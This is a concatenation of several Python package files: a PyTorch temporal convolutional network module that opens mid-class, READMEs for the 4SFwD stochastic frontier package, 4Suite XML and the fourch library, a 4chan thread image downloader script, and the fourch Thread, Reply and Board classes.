        super(Chomp1d, self).__init__()
        self.chomp_size = chomp_size

    def forward(self, x):
        # Slice with an explicit end index: the original ``:-chomp_size``
        # produced an *empty* tensor when chomp_size == 0 (e.g. for
        # kernel_size == 1, where the padding is zero).
        return x[:, :, :x.size(2) - self.chomp_size].contiguous()
class TemporalBlock(nn.Module):
    def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding, dropout=0.2):
        """One residual block of a TCN.

        Two chomped, dilated, weight-normalised causal convolutions, each
        followed by ReLU and dropout, plus a (possibly 1x1-projected)
        residual connection.

        Source: https://github.com/locuslab/TCN/blob/8845f88f31def1e7ffccb8811ea966e9f58d9695/TCN/tcn.py

        Args:
            n_inputs: number of input channels
            n_outputs: number of output channels
            kernel_size: convolution kernel width
            stride: convolution stride
            dilation: dilation factor of both convolutions
            padding: left padding, chomped off after each convolution
            dropout: dropout probability after each activation
        """
        super(TemporalBlock, self).__init__()
        self.conv1 = weight_norm(nn.Conv1d(n_inputs, n_outputs, kernel_size,
                                           stride=stride, padding=padding, dilation=dilation))
        self.chomp1 = Chomp1d(padding)
        self.relu1 = nn.ReLU()
        self.dropout1 = nn.Dropout(dropout)

        self.conv2 = weight_norm(nn.Conv1d(n_outputs, n_outputs, kernel_size,
                                           stride=stride, padding=padding, dilation=dilation))
        self.chomp2 = Chomp1d(padding)
        self.relu2 = nn.ReLU()
        self.dropout2 = nn.Dropout(dropout)

        # Main branch: (conv -> chomp -> relu -> dropout) twice.
        stages = (self.conv1, self.chomp1, self.relu1, self.dropout1,
                  self.conv2, self.chomp2, self.relu2, self.dropout2)
        self.net = nn.Sequential(*stages)

        # 1x1 conv matches channel counts on the skip path when needed.
        if n_inputs != n_outputs:
            self.downsample = nn.Conv1d(n_inputs, n_outputs, 1)
        else:
            self.downsample = None
        self.relu = nn.ReLU()
        self.init_weights()

    def init_weights(self):
        """Initialise every convolution weight from N(0, 0.01)."""
        for conv in (self.conv1, self.conv2):
            conv.weight.data.normal_(0, 0.01)
        if self.downsample is not None:
            self.downsample.weight.data.normal_(0, 0.01)

    def forward(self, x):
        out = self.net(x)
        residual = x if self.downsample is None else self.downsample(x)
        return self.relu(out + residual)
class TemporalConvNet(nn.Module):
    def __init__(self, num_inputs, num_channels, kernel_size=2, dropout=0.2):
        """Temporal Convolution Network (TCN).

        A stack of :class:`TemporalBlock`s whose dilation doubles at each
        level, so the receptive field grows exponentially with depth.

        Source: https://github.com/locuslab/TCN/blob/8845f88f31def1e7ffccb8811ea966e9f58d9695/TCN/tcn.py

        Args:
            num_inputs: number of input channels
            num_channels: output channels per level (its length = depth)
            kernel_size: kernel width shared by every block
            dropout: dropout probability inside each block
        """
        super(TemporalConvNet, self).__init__()
        blocks = []
        for level, out_channels in enumerate(num_channels):
            dilation = 2 ** level
            # First level reads the raw input; later levels read the
            # previous level's output channels.
            in_channels = num_inputs if level == 0 else num_channels[level - 1]
            blocks.append(
                TemporalBlock(in_channels, out_channels, kernel_size,
                              stride=1, dilation=dilation,
                              padding=(kernel_size - 1) * dilation,
                              dropout=dropout))
        self.network = nn.Sequential(*blocks)

    def forward(self, x):
        return self.network(x)
class TCNAdapterForRNN(TemporalConvNet):
    def __init__(self, input_size, hidden_size, num_layers=2, kernel_size=2, dropout=0.2, rnn_compatibility=True):
        """RNN adapter for TCN.

        Wraps :class:`TemporalConvNet` so it can be used as a drop-in
        replacement for RNN encoders that expect (batch, seq, features)
        tensors.

        Args:
            input_size (int): input feature size
            hidden_size (int): channels per convolutional layer
            num_layers (int): number of dilated convolutional layers
            kernel_size (int): kernel width of each layer
            dropout (float): dropout rate
            rnn_compatibility (bool): permute inputs/outputs between the
                RNN layout (batch, seq, features) and the Conv1d layout
                (batch, channels, seq)?
        """
        super(TCNAdapterForRNN, self).__init__(
            input_size, [hidden_size] * num_layers, kernel_size, dropout
        )
        self.rnn_compatibility = rnn_compatibility

    def forward(self, x):
        if not self.rnn_compatibility:
            return self.network(x)
        # (batch, seq, features) -> (batch, channels, seq), run the TCN,
        # then permute back for RNN-style consumers.
        return self.network(x.permute(0, 2, 1)).permute(0, 2, 1)
# SF4wD #
four-component stochastic frontier model with determinants
## Motivation ##
This package was developed by Ruei-Chi Lee to complement the four-component
stochastic frontier model by allowing determinants in the mean and variance
parameters of the inefficiency distributions.
## Installation ##
Install via `$ pip install 4SFwD`
## Features ##
* **SF4wD**: main.py - set method and model to run simulation or real data
* **HMC**: Hamilton Monte Carlo designed for determinants parameters.
* **DA**: Data augmentation for the model
* **TK**: Two-parametrization method originally proposed by Tsionas and Kumbhakar (2014) for the four-component model without determinants.
* **PMCMC**: Particle MCMC for the model (the preferred approach) - sped up by GPU parallel computation
## Example ##
Here is how you run a simulation estimation for a four-component stochastic frontier model via PMCMC:
- Parameter-setting guidelines are given in SF4wD.py.
- The simulation data only covers the stochastic frontier model that considers determinants in both the mean and variance parameters of the inefficiencies.
```python
import SF4wD
#model:str - different way to consider determinants
#method:str - different Bayesian method to estimate the model
#data_name : str - simulation data or data in data/.
#S : int - MCMC length
#H : int - number of particles in PMCMC
#gpu: boolean - use parallel computation to run PMCMC
#save: boolean - save MCMC data
my_model = SF4wD(model = 'D', method = 'PMCMC', data_name ='',S=10, H=100, gpu=False, save=False)
my_model.run()
```
output:
```python
mean sd hpd_3% hpd_97% mcse_mean mcse_sd ess_mean ess_sd ess_bulk ess_tail r_hat
beta0 2.412 0.093 2.318 2.555 0.046 0.035 4.0 4.0 7.0 10.0 NaN
beta1 1.078 0.074 0.977 1.242 0.023 0.017 10.0 10.0 10.0 10.0 NaN
xi0 0.580 0.043 0.531 0.652 0.014 0.011 9.0 9.0 8.0 10.0 NaN
xi1 0.694 0.127 0.479 0.867 0.073 0.058 3.0 3.0 3.0 10.0 NaN
delta0 0.141 0.072 0.013 0.273 0.023 0.019 10.0 8.0 10.0 10.0 NaN
delta1 0.774 0.137 0.620 0.984 0.079 0.063 3.0 3.0 3.0 10.0 NaN
z0 -0.461 0.716 -1.844 0.609 0.376 0.291 4.0 4.0 4.0 10.0 NaN
z1 2.728 0.889 1.268 3.941 0.459 0.354 4.0 4.0 4.0 10.0 NaN
gamma0 0.662 0.092 0.500 0.773 0.052 0.041 3.0 3.0 3.0 10.0 NaN
gamma1 0.412 0.061 0.349 0.519 0.021 0.015 9.0 9.0 9.0 10.0 NaN
sigma_alpha_sqr 1.377 0.178 1.095 1.693 0.075 0.057 6.0 6.0 6.0 10.0 NaN
sigma_v_sqr 2.575 2.523 1.290 9.515 1.062 0.793 6.0 6.0 3.0 10.0 NaN
```
## License ##
Ruei-Chi Lee is the main author and contributor.
Bug reports, feature requests, questions, rants, etc are welcome, preferably
on the github page.
| 4SFwD | /4SFwD-0.0.2.tar.gz/4SFwD-0.0.2/README.md | README.md |
4SUITE CONTENTS
===============
4Suite is a suite of Python modules for XML and RDF processing.
Its major components include the following:
* Ft.Xml.Domlette: A very fast, lightweight XPath-oriented DOM.
* Ft.Xml.Sax: A very fast SAX 2 parser.
* Ft.Xml.XPath: An XPath 1.0 implementation for Domlette documents.
* Ft.Xml.Xslt: A robust XSLT 1.0 processor.
* Ft.Xml.XUpdate: An XUpdate processor.
* Ft.Lib: Various support libraries that can be used independently.
* Ft.Rdf: RDF processing tools, including a query/inference language.
* Ft.Server: An integrated document & RDF repository with web access.
4Suite also includes convenient command-line tools:
* 4xml: XML document parsing and reserialization.
* 4xpath: XPath expression evaluation.
* 4xslt: XSLT processing engine.
* 4xupdate: XUpdate processing.
* 4rdf: RDF/XML parsing, persistence, querying and reserialization.
* 4ss_manager: Document/RDF repository administration.
* 4ss: Document/RDF repository user commands.
Effective version 1.0b2, Ft.Lib and Ft.Xml are distributed as the
"4Suite XML" release package. The Ft.Rdf and Ft.Server components will
be packaged as separate add-ons after the 4Suite XML 1.0 release.
If you need RDF or repository functionality before then, you must use
the monolithic 4Suite 1.0b1 release for now.
MINIMUM PREREQUISITES
=====================
* General requirements:
(1) The underlying platform must be either POSIX or Windows.
POSIX means any Unix-like OS, such as a major Linux distro,
FreeBSD, OpenBSD, NetBSD, Solaris, Cygwin, Mac OS X, etc.
Windows means Windows 2000, XP, or Server 2003. Windows 98, Me,
or NT might work, but no guarantees.
(2) Python 2.2.1 or higher.
(3) If building from source, a C compiler is required.
* Additional requirements for certain features:
* Triclops (RDF graph visualizer in repository Dashboard) - GraphViz
(any version with the executable 'dot' or 'dot.exe').
RECOMMENDATIONS
===============
* Use Python 2.3.5 or 2.4.4.
* Use an official python.org Python distribution, not ActiveState's.
* If PyXML is installed, make sure it is the latest version.
* If installing PyXML after 4Suite, install PyXML with --without-xpath.
OS-SPECIFIC INSTALLATION NOTES
==============================
* On POSIX, if building from source, the install step will result in a
build, if it hasn't been done already. The user doing the install
must have permission to write to all of the installation directories,
so it is typical to do the install, if not also the build, as root.
If you want to do the build step as a regular user, do it first with
'python setup.py build' as the regular user, then su to root, and run
'python setup.py install'.
* Some Linux distros come with old versions of 4Suite. Try to remove
all traces of the old versions before installing the new.
* Some POSIX platforms come with prebuilt versions of Python. Ensure
that the version you are using meets 4Suite's minimum prerequisites.
Some Python installations are missing libs and C headers, were built
with unusual options, or have other quirks that interfere with
building and using 4Suite. Affected users may need to replace their
Python installation, perhaps by building Python from source.
* On Windows, if installing with the self-extracting .exe, keys from a
standard Python distribution from python.org must be present in the
Registry.
* On Mac OS X, it is recommended by the pythonmac-sig to use the
universal installer for both PPC and Intel Macs instead of the system
supplied (Apple's) Python.
GENERAL INSTALLATION
====================
On Windows, if installing from self-extracting .exe:
1. Just run the installer.
On Red Hat Linux, if installing from .rpm archive:
1. Use 'rpm' in the normal way.
On POSIX or Windows, if building from source:
1. Unpack the source distribution.
2. cd 4Suite
3. As root, run 'python setup.py install'
For custom build and installation options, see
'python setup.py --help'
'python setup.py config --help'
'python setup.py build --help'
'python setup.py install --help'
See more detailed instructions at
http://4suite.org/docs/UNIX.xml (POSIX)
http://4Suite.org/docs/Windows.xml (Windows)
POST-INSTALL TESTING
====================
Extensive regression tests are bundled with 4Suite. After installation,
you can go to the Tests directory (its installed location varies by
platform) and follow the instructions in the README there.
DOCUMENTATION
=============
Documentation is piecemeal and always a work-in-progress; sorry.
As mentioned, detailed instructions for installation are on 4suite.org.
Detailed instructions for setting up and using some of the repository
features of 4Suite are at http://4suite.org/docs/QuickStart.xml
An installation layout guide that describes common install locations
and how the current installation system works is available at
http://4suite.org/docs/installation-locations.xhtml
Python API docs (in XML and HTML) can be generated when building from
source by adding the option '--with-docs' to the setup.py invocation.
These will end up in a documentation directory during the install;
the exact location varies depending on the '--docdir' option.
Pre-generated API docs (HTML only) can be downloaded from 4suite.org
or from the 4Suite project page on SourceForge.
A detailed users' manual covering 4Suite's XML processing features is
available for viewing online at http://4suite.org/docs/CoreManual.xml.
The HTML version is generated and distributed with the API docs.
Many helpful and important docs can be found in Uche's Akara at
http://uche.ogbuji.net/tech/akara/4suite/
Any questions not answered by these docs should be asked on the 4Suite
mailing list. See http://lists.fourthought.com/mailman/listinfo/4suite
Developers and users can also confer via IRC on irc.freenode.net
channel #4suite.
ENVIRONMENT VARIABLES
=====================
None of these are necessary for a basic installation to work;
this list is just for reference.
FTSERVER_CONFIG_FILE = The absolute path of the repository config file.
Required if you want to use the repository features of 4Suite.
FT_DATABASE_DIR = The directory to use for filesystem-based repository
database. Optional (will default) but recommended if using the
FlatFile repository driver.
FTSS_USERNAME = Repository username to use when invoking 4ss command-
line tools, to avoid being prompted. This is overridden by
'4ss agent' or '4ss login' settings. Optional.
FTSS_PASSWORD_FILE = The absolute path of the file in which to store
4ss command-line tool login information. Used by '4ss login'.
Optional (will default to a file in the user's home directory, or
the Windows folder on Windows).
XML_CATALOG_FILES = The absolute paths or URIs of XML or TR9401 Catalogs
to use. Optional. Used by Ft.Xml.Catalog at import time. Items in the
list must be separated by os.pathsep (";" on Windows, ":" on POSIX).
XSLTINCLUDE = The absolute paths from which alternative URIs for the
XSLT stylesheet will be derived, for the purpose of extending the
resolution capability of xsl:include and xsl:import instructions.
Optional. Used by the 4xslt command-line tool only.
EXTMODULES = The names of Python modules that define XPath extension
functions and/or XSLT extension elements. Multiple modules must be
separated in the list by ":". Optional (this info can also be set
directly on instances of Ft.Xml.XPath.Context.Context or
Ft.Xml.Xslt.Processor.Processor).
UPGRADING
=========
Detailed instructions are not available, sorry.
Upgrading 4Suite from 0.11.1:
Remove all traces of 0.11.1 *and* PyXML first, since they were
integrated. Unset environment variables that were related to the
old version of 4Suite. Check your PATH; 4Suite 0.11.1 installed
command-line scripts to a different location than what you need now.
Also, update any Python scripts that you may have that rely on the
old APIs to use the new; for example, use Ft.Xml.XPath and Ft.Xml.Xslt
instead of xml.xpath and xml.xslt.
Upgrading from 0.12.0a1, 0.12.0a2, 0.12.0a3, 1.0a1, 1.0a3:
Installation locations varied; remove as much as you can first.
Check your PATH; as of 4Suite 1.0a4, the command-line scripts
are installed to a different location than before, but the old
scripts will not be removed when the new ones are installed.
Repository users:
Upgrading can be tricky. First read
http://lists.fourthought.com/pipermail/4suite/2004-October/012933.html
Also, if there is a 4ss.conf in the same location as where
the default server config file will be installed (e.g., in
/usr/local/lib/4Suite on Unix), it will be renamed, so be sure
that your FTSERVER_CONFIG_FILE still points to your own config file
(it's a good idea to move it out of the way of future upgrades).
Upgrading from 1.0a4, 1.0b1, 1.0b2, 1.0b3, 1.0rc1, 1.0rc2:
There are no special instructions for upgrading from these versions.
Keeping up-to-date with current development code:
See the CVS instructions at http://4suite.org/docs/4SuiteCVS.xml | 4Suite-XML | /4Suite-XML-docs-1.0.2.zip/4Suite-XML-docs-1.0.2/README | README |
from urlparse import urlparse
import argparse
import httplib
import urllib2
import re
import time
import json
import os
import threading
sleep_time = 10  # seconds between polls of the thread JSON
wait_thread_sleep_time = 2  # seconds to wait when all worker threads are busy
cache_string = "Run out of free thread. Retry after" + \
    str(wait_thread_sleep_time) + "second"
number_of_thread = 10  # maximum number of concurrent download threads
class downloadThread (threading.Thread):
    """Worker thread that downloads a single media file into *folder*."""
    def __init__(self, url, folder):
        threading.Thread.__init__(self)
        self.url = url  # direct URL of the image/webm to fetch
        self.folder = folder  # destination directory name, relative to cwd
    def run(self):
        print "Starting download thread for " + self.url
        download(self.url, self.folder)
        print "Exiting download thread for " + self.url
def download(url, folder):
    """Download *url* into .\\<folder>\\, skipping files that already exist
    with the expected size (cheap resume support).

    NOTE: paths are built with Windows-style '\\' separators, so this
    script assumes it is running on Windows.
    """
    file_name = '.\\' + folder + '\\' + url.split('/')[-1]
    if not os.path.exists('.\\' + folder + '\\'):
        os.makedirs('.\\' + folder + '\\')
    # Spoof a browser user-agent; the bare urllib2 agent may be rejected.
    headers = {'User-Agent': 'Mozilla/5.0'}
    req = urllib2.Request(url, None, headers)
    u = urllib2.urlopen(req)
    meta = u.info()
    file_size = int(meta.getheaders("Content-Length")[0])
    # Check if file is already downloaded
    if os.path.isfile(file_name) and file_size == os.stat(file_name).st_size:
        print "File "+file_name+" is already downloaded"
        return
    # Begin download
    file_size_dl = 0
    block_sz = 1024  # read in 1 KiB chunks so progress can be reported
    with open(file_name, 'wb') as f:
        while True:
            buffer = u.read(block_sz)
            if not buffer:
                break
            file_size_dl += len(buffer)
            f.write(buffer)
            status = r" [%3.2f%%]" % (file_size_dl * 100. / file_size)
            print "Downloading:" + file_name + status
def check_thread(board, sid):
    """Poll the 4chan API for thread *sid* on *board* every `sleep_time`
    seconds, saving the raw thread JSON and dispatching download threads
    for newly appeared media, until the thread 404s (dies)."""
    prev_img_list = []  # media entries already dispatched on a previous poll
    while True:
        myConnection = httplib.HTTPSConnection(
            "a.4cdn.org")
        myConnection.request("GET", "/" + board + "/thread/" + sid + ".json")
        reply = myConnection.getresponse()
        print reply.status, reply.reason
        if reply.status == 404:
            print "404 Not found. Please check the URL again!"
            break
        temp_json = reply.read()
        # Scrape per-post media metadata (filename .. tim) out of the raw JSON
        # with a regex rather than fully parsing the document.
        img_list = re.findall(r'"filename":".+?".+?"tim":.+?,', temp_json)
        if not os.path.exists('.\\' + board + sid + '\\'):
            os.makedirs('.\\' + board + sid + '\\')
        with open('.\\' + board + sid + '\\' + sid + ".json", 'wb') as f:
            f.write(temp_json)
        # Print img_list
        myConnection.close()
        # Only process entries appended since the previous poll; earlier
        # entries were already handed to download threads.
        for i in img_list[len(prev_img_list):]:
            j = json.loads('{'+i[:-1]+'}')
            download_link = \
                "http://i.4cdn.org/" + board + "/" + str(j['tim']) + j['ext']
            print download_link
            # Throttle: block until a worker slot frees up.
            while (threading.activeCount() == number_of_thread):
                print cache_string
                time.sleep(wait_thread_sleep_time)
            downloadThread(download_link, board + sid).start()
        prev_img_list = img_list
        time.sleep(sleep_time)
def parse_thread_URL(url):
    """Split a 4chan thread URL into its (board, thread id) components.

    Expects a path of the form /<board>/thread/<id>."""
    parts = urlparse(url).path.split('/')
    board, thread_id = parts[1], parts[3]
    return board, thread_id
prog_description = 'Download all images and json of a 4chan thread until '\
    'thread dies. Resume and multi-thread download supported.'\
    'From json and the images, the original html can be generated.'

# Build the command-line interface.
parser = argparse.ArgumentParser(description=prog_description)
parser.add_argument('threadURL', metavar='Thread_URL',
                    help='The thread URL for example '
                         'http://boards.4chan.org/biz/thread/1873336')
# Fix: the worker-thread count must be an int with default 10 as documented.
# Previously the default was (uselessly) attached to the positional argument
# and the option value stayed a string/None, so the comparison against
# threading.activeCount() in check_thread() could never match.
parser.add_argument('-t', '--thread_num', metavar='number',
                    type=int, default=10,
                    help='The number of download thread, default is 10')
args = parser.parse_args()

number_of_thread = args.thread_num
board, thread_id = parse_thread_URL(args.threadURL)
check_thread(board, thread_id)
fourch
======
.. _docs: https://4ch.readthedocs.org
.. _repo: https://github.com/plausibility/4ch
fourch (stylized as 4ch) is a wrapper to the 4chan JSON API, provided by moot. It allows you to interact with 4chan (in a READONLY way) easily through your scripts.
Originally <strike>stolen</strike> forked from `e000/py-4chan <https://github.com/e000/py-4chan>`_, but then I moved repos and renamed stuff since I'm pretty bad about that.
Requirements
------------
- Python 2.7 (what I test with, 2.x might work)
- requests
Notes
-----
- This isn't guaranteed to work all the time; after all, the API may change, and 4ch will have to be updated accordingly.
- If a feature is missing, open an issue on the `repo`_, and it may well be implemented.
Running / Usage
---------------
- Install & import: ``$ pip install 4ch``, ``import fourch``
- See the `docs`_
Contributing
------------
If you're interested in contributing to the usability of 4ch, or just want to give away stars, you can visit the 4ch github `repo`_.
| 4ch | /4ch-1.0.0.tar.gz/4ch-1.0.0/README.rst | README.rst |
import requests
from .reply import Reply
class Thread(object):
    """ This object stores information about the given thread.
    It has a list of fourch.replies, as well as options to
    easily pull in updates (new posts), and create an instance
    with the json of a thread.
    """

    def __init__(self, board, res):
        """ Create the thread instance and initialize variables.

        :param board: the :class:`fourch.Board` parent instance
        :type board: :class:`fourch.Board`
        :param res: the given threads number
        :type res: str or int
        """
        self._board = board
        self.res = res
        self.alive = True  # flipped to False once the thread 404s
        self.op = None  # the opening post, a :class:`fourch.Reply`
        self.replies = []
        self.omitted_posts = 0
        self.omitted_images = 0
        # If this is a precached thread, should it get updated?
        self._should_update = False
        # HTTP Last-Modified header for If-Modified-Since
        self._last_modified = None

    def __repr__(self):
        # Mention omitted counts only when the API actually reported some.
        end = ""
        if self.omitted_posts or self.omitted_images:
            end = ", {0} omitted posts, {1} omitted images".format(
                self.omitted_posts, self.omitted_images
            )
        return "<{0} /{1}/{2}, {3} replies{4}>".format(
            self.__class__.__name__,
            self._board.name,
            self.res,
            len(self.replies),
            end
        )

    @staticmethod
    def from_req(board, res, r):
        """ Create a thread object from the given request.
        If the thread has 404d, this will return None,
        and if it isn't 200 OK, it will raise_for_status().
        Actually creates the thread by calling :func:`from_json`.

        :param board: the :class:`fourch.Board` parent instance
        :type board: :class:`fourch.Board`
        :param res: the given threads number
        :type res: str or int
        :param r: the requests object
        :type r: requests.models.Response
        """
        if r.status_code == requests.codes.not_found:
            return None
        elif r.status_code == requests.codes.ok:
            return Thread.from_json(board,
                                    r.json(),
                                    res=res,
                                    last_modified=r.headers["last-modified"])
        else:
            r.raise_for_status()

    @staticmethod
    def from_json(board, json, res=None, last_modified=None):
        """ Create a thread object from the given JSON data.

        :param board: the :class:`fourch.Board` parent instance
        :type board: :class:`fourch.Board`
        :param json: the json data from the 4chan API
        :type json: dict
        :param res: the given threads number
        :type res: str or int
        :param last_modified: when was the page last modified
        :type last_modified: int or None
        :return: the created :class:`fourch.Thread`
        :rtype: :class:`fourch.Thread`
        """
        t = Thread(board, res)
        t._last_modified = last_modified
        replies = json["posts"]
        # The first entry of "posts" is always the OP.
        t.op = Reply(t, replies.pop(0))
        t.replies = [Reply(t, r) for r in replies]
        if res is None:
            # No thread number supplied (e.g. board-index JSON): derive it
            # from the OP and flag the thread for a full refresh later.
            t._should_update = True
            t.res = t.op.number
        t.omitted_posts = t.op._json.get("omitted_posts", 0)
        t.omitted_images = t.op._json.get("omitted_images", 0)
        return t

    @property
    def sticky(self):
        """ Is this thread stuck?

        :return: whether or not the thread is stuck
        :rtype: bool
        """
        return self.op.sticky

    @property
    def closed(self):
        """ Is the thread closed?

        :return: whether or not the thread is closed
        :rtype: bool
        """
        return self.op.closed

    @property
    def last_reply(self):
        """ Return the last :class:`fourch.Reply` to the thread, or the op
        if there are no replies.

        :return: the last :class:`fourch.Reply` to the thread.
        :rtype: :class:`fourch.Reply`
        """
        if not self.replies:
            return self.op
        return self.replies[-1]

    @property
    def images(self):
        """ Create a generator which yields all of the image urls for the thread.

        :return: a generator yielding all image urls
        :rtype: generator
        """
        yield self.op.file.url
        for r in self.replies:
            if not r.has_file:
                continue
            yield r.file.url

    def update(self, force=False):
        """ Update the thread, pulling in new replies,
        appending them to the reply pool.

        :param force: should replies be replaced with fresh reply objects
        :type force: bool
        :return: the number of new replies
        :rtype: int
        """
        if not self.alive and not force:
            return 0
        url = self._board.url("api_thread",
                              board=self._board.name,
                              thread=self.res)
        headers = None
        if self._last_modified:
            # If-Modified-Since, to not waste bandwidth.
            headers = {
                "If-Modified-Since": self._last_modified
            }
        r = self._board._session.get(url, headers=headers)
        if r.status_code == requests.codes.not_modified:
            # 304 Not Modified
            return 0
        elif r.status_code == requests.codes.not_found:
            # 404 Not Found
            self.alive = False
            # Remove from cache.
            self._board._cache.pop(self.res, None)
            return 0
        elif r.status_code == requests.codes.ok:
            if not self.alive:
                # Thread came back (forced update on a dead thread);
                # re-register it in the board cache.
                self.alive = True
                self._board._cache[self.res] = self
            self._should_update = False
            self.omitted_posts = 0
            self.omitted_images = 0
            self._last_modified = r.headers["last-modified"]
            replies = r.json()["posts"]
            post_count = len(self.replies)
            self.op = Reply(self, replies.pop(0))
            if not force:
                # Only append posts newer than the newest one we hold.
                self.replies.extend(
                    [Reply(self, p)
                     for p in replies
                     if p["no"] > self.last_reply.number]
                )
            else:
                self.replies = [Reply(self, p) for p in replies]
            post_count_new = len(self.replies)
            post_count_diff = post_count_new - post_count
            if post_count_diff < 0:
                raise Exception("post count delta is somehow negative...")
            return post_count_diff
        else:
            r.raise_for_status()
import fourch
import base64
import re
class Reply(object):
    """ This object stores information regarding a specific post
    on any given thread. It uses python properties to easily
    allow access to information.
    """

    def __init__(self, thread, json):
        """ Initialize the reply with the relevant information

        :param thread: the :class:`fourch.Thread` parent instance
        :type thread: :class:`fourch.Thread`
        :param json: the json data for this post
        :type json: dict
        """
        self._thread = thread
        self._json = json

    def __repr__(self):
        return "<{0}.{1} /{2}/{3}#{4}, image: {5}>".format(
            self.__class__.__module__,
            self.__class__.__name__,
            self._thread._board.name,
            self._thread.res,
            self.number,
            bool(self.has_file)
        )

    @property
    def is_op(self):
        """Is this post the OP (first post in thread)"""
        return self._json.get("resto", 1) == 0

    @property
    def number(self):
        """The number relating to this post"""
        return self._json.get("no", 0)

    @property
    def reply_to(self):
        """What post ID is this a reply to"""
        return self._json.get("resto", 0)

    @property
    def sticky(self):
        """Is this thread stuck?"""
        return bool(self._json.get("sticky", 0))

    @property
    def closed(self):
        """Is this thread closed?"""
        return bool(self._json.get("closed", 0))

    @property
    def now(self):
        """Humanized date string of post time"""
        return self._json.get("now", "")

    @property
    def timestamp(self):
        """The UNIX timestamp of post time"""
        return self._json.get("time", 0)

    @property
    def tripcode(self):
        """Trip code, if any, of the post"""
        return self._json.get("trip", "")

    @property
    def id(self):
        """Post ID, if any. (Admin, Mod, Developer, etc)"""
        return self._json.get("id", "")

    @property
    def capcode(self):
        """Post capcode, if any. (none, mod, admin, etc)"""
        return self._json.get("capcode", "")

    @property
    def country(self):
        """ The country code this was posted from. Two characters, XX if
        unknown.
        """
        return self._json.get("country", "XX")

    @property
    def country_name(self):
        """The name of the country this was posted from"""
        return self._json.get("country_name", "")

    @property
    def email(self):
        """The email attached to the post"""
        return self._json.get("email", "")

    @property
    def subject(self):
        """The subject of the post"""
        return self._json.get("sub", "")

    @property
    def comment(self):
        """The comment, including escaped HTML"""
        return self._json.get("com", "")

    @property
    def comment_text(self):
        """ The stripped (mostly) plain text version of the comment.
        The comment goes through various regexes to become (mostly) clean.

        Some HTML will still be present, this is because the stdlib
        unescaper won't cover every construct 4chan emits.
        """
        # Fix: the original did `import HTMLParser`, a Python-2-only module,
        # which made this property raise ImportError on Python 3.  Prefer the
        # Python 3 stdlib html.unescape and fall back to HTMLParser on py2.
        try:
            from html import unescape  # Python 3
        except ImportError:  # Python 2 fallback
            from HTMLParser import HTMLParser
            unescape = HTMLParser().unescape
        com = self.comment
        # <span class="quote">>text!</span>
        # --- >text!
        com = re.sub(r"\<span[^>]+\>(?:>|>)([^</]+)\<\/span\>",
                     r">\1",
                     com,
                     flags=re.I)
        # <a class="quotelink" href="XX#pYYYY">>>YYYY</a>
        # --- >>YYYY
        com = re.sub(r"\<a[^>]+\>(?:>|>){2}(\d+)\<\/a\>",
                     r">>\1",
                     com,
                     flags=re.I)
        # Add (OP) to quotelinks to op
        com = re.sub(r"\>\>({0})".format(self._thread.op.number),
                     r">>\1 (OP)",
                     com,
                     flags=re.I)
        # <br> or <br /> to newline
        com = re.sub(r"\<br ?\/?\>", "\n", com, flags=re.I)
        # Unescape whatever HTML entities remain.
        com = unescape(com)
        return com

    @property
    def url(self):
        """The URL of the post on the parent thread"""
        return "{0}{1}/{2}/thread/{3}#p{4}".format(
            self._thread._board.proto,
            self._thread._board._urls["boards"],
            self._thread._board.name,
            self._thread.res,
            self.number
        )

    # File related
    @property
    def has_file(self):
        """Whether or not this post has an image attached"""
        return "filename" in self._json

    @property
    def file(self):
        """ This holds the information regarding the image attached
        to a post, if there is one at all.
        It returns the relevant information in a class format,
        accessible via ``r.file.url``, for example.

        Information stored:

        - renamed
        - name
        - extension
        - size
        - md5
        - md5b64
        - width
        - height
        - thumb_width
        - thumb_height
        - deleted
        - spoiler
        - url
        - thumb_url

        :return: a struct with information related to image
        """
        if not self.has_file:
            return fourch.struct()
        f = {
            "renamed": self._json.get("tim", 0),
            "name": self._json.get("filename", ""),
            "extension": self._json.get("ext", ""),
            "size": self._json.get("fsize", 0),
            "md5": base64.b64decode(self._json.get("md5")),
            "md5b64": self._json.get("md5", ""),
            "width": self._json.get("w", 0),
            "height": self._json.get("h", 0),
            "thumb_width": self._json.get("tn_w", 0),
            "thumb_height": self._json.get("tn_h", 0),
            "deleted": bool(self._json.get("filedeleted", 0)),
            "spoiler": bool(self._json.get("spoiler", 0)),
            "url": "",
            "thumb_url": ""
        }
        f["url"] = "{0}{1}/{2}/{3}{4}".format(
            self._thread._board.proto,
            fourch.urls["images"],
            self._thread._board.name,
            f["renamed"],
            f["extension"]
        )
        f["thumb_url"] = "{0}{1}/{2}/{3}s.jpg".format(
            self._thread._board.proto,
            fourch.urls["thumbs"],
            self._thread._board.name,
            f["renamed"]
        )
        return fourch.struct(**f)
import requests
import fourch
from .thread import Thread
class Board(object):
    """ fourch.Board is the master instance which allows easy access to the
    creation of thread objects.
    """

    def __init__(self, name, https=False):
        """ Create the board instance, and initialize internal variables.

        :param name: The board name, minus slashes. e.g., 'b', 'x', 'tv'
        :type name: string
        :param https: Should we use HTTPS or HTTP?
        :type https: bool
        """
        self.name = name
        self.https = https
        self._session = None  # created lazily by the .session property
        self._cache = {}  # {id: fourch.Thread(id)} -- prefetched threads

    def __repr__(self):
        # TODO: Fetch title/nsfw status from /boards.
        return "<{0} /{1}/>".format(
            self.__class__.__name__,
            self.name
        )

    @property
    def session(self):
        """Lazily-constructed requests.Session carrying a fourch user-agent."""
        if self._session is None:
            self._session = requests.Session()
            uaf = "fourch/{0} (@https://github.com/sysr-q/4ch)"
            self._session.headers.update({
                "User-agent": uaf.format(fourch.__version__),
            })
        return self._session

    @property
    def proto(self):
        # Since this might change on-the-fly..
        return "https://" if self.https else "http://"

    def url(self, endpoint, *k, **v):
        """Build a full API URL for *endpoint*, formatted with *k*/*v*."""
        return (self.proto
                + fourch.urls["api"]
                + fourch.urls[endpoint].format(*k, **v))

    def catalog(self):
        """ Get a list of all the thread OPs and last replies.
        """
        url = self.url("api_catalog", board=self.name)
        r = self.session.get(url)
        return r.json()

    def threads(self):
        """ Get a list of all the threads alive, and which page they're on.
        You can cross-reference this with a threads number to see which
        page it's on at the time of calling.
        """
        url = self.url("api_threads", board=self.name)
        r = self.session.get(url)
        return r.json()

    def thread(self, res, update_cache=True):
        """ Create a :class:`fourch.thread` object.
        If the thread has already been fetched, return the cached thread.

        :param res: the thread number to fetch
        :type res: str or int
        :param update_cache: should we update if it's cached?
        :type update_cache: bool
        :return: the :class:`fourch.Thread` object
        :rtype: :class:`fourch.Thread` or None
        """
        if res in self._cache:
            t = self._cache[res]
            if update_cache:
                t.update()
            return t
        url = self.url("api_thread", board=self.name, thread=res)
